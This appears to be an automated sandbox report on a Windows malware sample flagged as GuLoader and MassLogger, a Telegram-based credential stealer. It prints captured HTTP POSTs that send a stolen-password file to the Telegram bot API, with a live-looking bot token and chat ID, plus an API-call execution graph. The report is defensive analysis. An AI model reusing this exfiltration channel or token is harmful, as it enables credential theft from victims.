                                                                                                          2025-01-10 21:14:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 64 33 30 35 66 62 39 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32ed305fb91eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:57 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:57 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:57 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43570,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543697,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.750006149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:58 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3301104a174e
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 31 31 30 34 61 31 37 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3301104a174eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:59 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:59 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:59 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43571,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543699,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.750008149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:15:00 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3314dfea71ff
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:15:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 34 64 66 65 61 37 31 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3314dfea71ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:15:00 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:15:00 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:15:00 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 37 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43572,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543700,"document":{"file_n


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:1
                                                                                                          Start time:16:13:04
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\V7OHj6ISEo.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'027'682 bytes
                                                                                                          MD5 hash:44CA4D83095D7F0372C1EAB439F633BE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1838395220.0000000005033000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:18:09:43
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\V7OHj6ISEo.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'027'682 bytes
                                                                                                          MD5 hash:44CA4D83095D7F0372C1EAB439F633BE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:19.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:19.6%
                                                                                                            Total number of Nodes:1592
                                                                                                            Total number of Limit Nodes:38
                                                                                                            execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405ab2 5 API calls 4200 405c94 4197->4200 4199 405c3c FindNextFileW 4201 405c52 FindClose 4199->4201 4199->4213 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4199 4211 405cac 4210->4211 4211->4180 4213->4199 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4230 406417 4215->4230 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4230 4222 40640a 10 API calls 4222->4219 4224 406545 GetSystemDirectoryW 4224->4230 4225 406558 GetWindowsDirectoryW 4225->4230 4226 40667c 5 API calls 4226->4230 4227 40658c SHGetSpecialFolderLocation 4227->4230 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4227->4231 4228 40640a 10 API calls 4228->4230 4229 4065d3 lstrcatW 4229->4230 4230->4216 4230->4219 4230->4222 4230->4224 4230->4225 4230->4226 4230->4227 4230->4228 4230->4229 4241 4062b6 4230->4241 4246 40632f wsprintfW 4230->4246 4247 4063e8 lstrcpynW 4230->4247 4231->4230 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4230 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4230 4247->4230 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4213 4284->4283 4286 40546b 4285->4286 4287 40550d 4285->4287 4288 405487 lstrlenW 4286->4288 4289 40640a 17 API calls 4286->4289 4287->4213 4290 4054b0 4288->4290 4291 405495 lstrlenW 4288->4291 4289->4288 4293 4054c3 4290->4293 4294 4054b6 SetWindowTextW 4290->4294 4291->4287 4292 4054a7 lstrcatW 4291->4292 4292->4290 4293->4287 4295 4054c9 SendMessageW SendMessageW SendMessageW 4293->4295 4294->4293 4295->4287 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4197 4305->4304 4306->4259 4308 405d85 4307->4308 4311 405d97 4307->4311 4310 405d92 CharNextW 4308->4310 4308->4311 4309 405dbb 4309->4262 4309->4263 4310->4309 4311->4309 4312 405cea CharNextW 4311->4312 4312->4311 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4319 4061a9 4318->4319 4320 40609f 4318->4320 4319->4297 4320->4319 4322 4060a7 wsprintfA 4320->4322 4324 40640a 17 API calls 4322->4324 4323 40606e CloseHandle GetShortPathNameW 4323->4319 4325 406082 4323->4325 4326 4060cf 4324->4326 4325->4318 4325->4319 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4319 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4319 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4323 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4370 4015d1 4357->4370 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4370 4363 401423 24 API calls 4360->4363 4381 401423 4361->4381 4367 40165b 4363->4367 4369 40164a SetCurrentDirectoryW 4369->4367 4370->4358 4370->4359 4371 401617 GetFileAttributesW 4370->4371 4373 4059b9 4370->4373 4376 40591f CreateDirectoryW 4370->4376 4385 40599c CreateDirectoryW 4370->4385 4371->4370 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4370 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4369 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4370 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4393 4059c0 4389->4393 4394 406752 GetSystemDirectoryW 4390->4394 4392 4067e4 4392->4389 4392->4393 4393->4370 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4392 5288 75562c57 5289 75562c6f 5288->5289 5290 7556158f 2 API calls 5289->5290 5291 75562c8a 5290->5291 5292 755616d4 5293 75561703 5292->5293 5294 75561b5f 22 API calls 5293->5294 5295 7556170a 5294->5295 5296 75561711 5295->5296 5297 7556171d 5295->5297 5298 75561272 2 API calls 5296->5298 5299 75561727 5297->5299 5300 75561744 5297->5300 5306 7556171b 5298->5306 5303 7556153d 3 API calls 5299->5303 5301 7556176e 5300->5301 5302 7556174a 5300->5302 5305 7556153d 3 API calls 5301->5305 5304 755615b4 3 API calls 5302->5304 5307 7556172c 5303->5307 5308 7556174f 5304->5308 5305->5306 5309 755615b4 3 API calls 5307->5309 5310 75561272 2 API calls 5308->5310 5311 75561732 5309->5311 5313 75561755 GlobalFree 5310->5313 5312 75561272 2 API calls 5311->5312 5314 75561738 GlobalFree 5312->5314 5313->5306 5315 75561769 GlobalFree 5313->5315 5314->5306 5315->5306 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 4053da 4398->4400 4410 405431 4398->4410 4401 405410 4399->4401 4402 4053f0 IsWindowVisible 4399->4402 4411 4043ab 4400->4411 4403 405436 CallWindowProcW 4401->4403 4419 404d9a 4401->4419 4405 4053fd 4402->4405 4402->4410 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4410->4403 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4401 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4410 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4904 402659 4894->4904 4895 402796 4896 4026a3 ReadFile 4896->4895 4896->4904 4897 40273c 4897->4895 4897->4904 4907 405fbf SetFilePointer 4897->4907 4898 405f61 ReadFile 4898->4904 4899 4026e3 MultiByteToWideChar 4899->4904 4900 402798 4916 40632f wsprintfW 4900->4916 4903 402709 SetFilePointer MultiByteToWideChar 4903->4904 4904->4895 4904->4896 4904->4897 4904->4898 4904->4899 4904->4900 4904->4903 4905 4027a9 4904->4905 4905->4895 4906 4027ca SetFilePointer 4905->4906 4906->4895 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4897 4916->4895 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4927 405037 4917->4927 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4925 4051c7 4922->4925 4930 4053af 4922->4930 4937 405174 SendMessageW 4922->4937 4926 40640a 17 API calls 4923->4926 4929 40435f 18 API calls 4924->4929 4931 4051d1 SendMessageW 4925->4931 4932 4051d9 4925->4932 4933 404ee3 SendMessageW SendMessageW 4926->4933 4927->4922 4928 4050fc 4927->4928 4934 405097 4927->4934 4928->4922 4939 40510d SendMessageW 4928->4939 4935 404f15 4929->4935 4938 4043c6 8 API calls 4930->4938 4931->4932 4945 4051f2 4932->4945 4946 4051eb ImageList_Destroy 4932->4946 4956 405202 4932->4956 4933->4921 4940 404d1a 5 API calls 4934->4940 4936 40435f 18 API calls 4935->4936 4941 404f23 4936->4941 4937->4930 4943 405189 SendMessageW 4937->4943 4944 4053bd 4938->4944 4939->4922 4964 4050a8 4940->4964 4948 404ff8 GetWindowLongW SetWindowLongW 4941->4948 4955 404f73 SendMessageW 4941->4955 4958 404ff2 4941->4958 4960 404fc0 SendMessageW 4941->4960 4961 404faf SendMessageW 4941->4961 4942 405371 4942->4930 4950 405383 ShowWindow GetDlgItem ShowWindow 4942->4950 4949 40519c 4943->4949 4947 4051fb GlobalFree 4945->4947 4945->4956 4946->4945 4947->4956 4951 405011 4948->4951 4957 4051ad SendMessageW 4949->4957 4950->4930 4952 405017 ShowWindow 4951->4952 4953 40502f 4951->4953 4973 404394 SendMessageW 4952->4973 4974 404394 SendMessageW 4953->4974 4955->4941 4956->4942 4962 404d9a 4 API calls 4956->4962 4968 40523d 4956->4968 4957->4925 4958->4948 4958->4951 4960->4941 4961->4941 4962->4968 4963 40502a 4963->4930 4964->4928 4965 405347 InvalidateRect 4965->4942 4966 40535d 4965->4966 4975 404cd5 4966->4975 4967 40526b SendMessageW 4969 405281 4967->4969 4968->4967 4968->4969 4969->4965 4971 4052e2 4969->4971 4972 4052f5 SendMessageW SendMessageW 4969->4972 4971->4972 4972->4969 4973->4963 4974->4927 4978 404c0c 4975->4978 4977 404cea 4977->4942 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5319 4016cc 5320 402c41 17 API calls 5319->5320 5321 4016d2 GetFullPathNameW 5320->5321 5322 4016ec 5321->5322 5328 40170e 5321->5328 5325 40672b 2 API calls 5322->5325 5322->5328 5323 401723 GetShortPathNameW 5324 402ac5 5323->5324 5326 4016fe 5325->5326 5326->5328 5329 4063e8 lstrcpynW 5326->5329 5328->5323 5328->5324 5329->5328 5330 75561058 5332 75561074 5330->5332 5331 755610dd 5332->5331 5334 75561092 5332->5334 5343 75561516 5332->5343 5335 75561516 GlobalFree 5334->5335 5336 755610a2 5335->5336 5337 755610b2 5336->5337 5338 755610a9 GlobalSize 5336->5338 5339 755610b6 GlobalAlloc 5337->5339 5340 755610c7 5337->5340 5338->5337 5341 7556153d 3 API calls 5339->5341 5342 755610d2 GlobalFree 5340->5342 5341->5340 5342->5331 5345 7556151c 5343->5345 5344 75561522 5344->5334 5345->5344 5346 7556152e GlobalFree 5345->5346 5346->5334 5347 40234e 5348 402c41 17 API calls 5347->5348 5349 40235d 5348->5349 5350 402c41 17 API calls 5349->5350 5351 402366 5350->5351 5352 402c41 17 API calls 5351->5352 5353 402370 GetPrivateProfileStringW 5352->5353 5354 4044cf lstrlenW 5355 4044f0 WideCharToMultiByte 5354->5355 5356 4044ee 5354->5356 5356->5355 5357 755618d9 5358 755618fc 5357->5358 5359 75561931 GlobalFree 5358->5359 5360 75561943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5358->5360 5359->5360 5361 75561272 2 API calls 5360->5361 5362 75561ace GlobalFree GlobalFree 5361->5362 5363 404850 5364 40487c 5363->5364 5365 40488d 5363->5365 5424 405a32 GetDlgItemTextW 5364->5424 5367 404899 GetDlgItem 5365->5367 5372 4048f8 5365->5372 5369 4048ad 5367->5369 5368 404887 5371 40667c 5 API calls 5368->5371 5374 4048c1 SetWindowTextW 5369->5374 5379 405d68 4 API calls 5369->5379 5370 4049dc 5422 404b8b 5370->5422 5426 405a32 GetDlgItemTextW 5370->5426 5371->5365 5372->5370 5376 40640a 17 API calls 5372->5376 5372->5422 5377 40435f 18 API calls 5374->5377 5375 404a0c 5380 405dc5 18 API calls 5375->5380 5381 40496c SHBrowseForFolderW 5376->5381 5382 4048dd 5377->5382 5378 4043c6 8 API calls 5383 404b9f 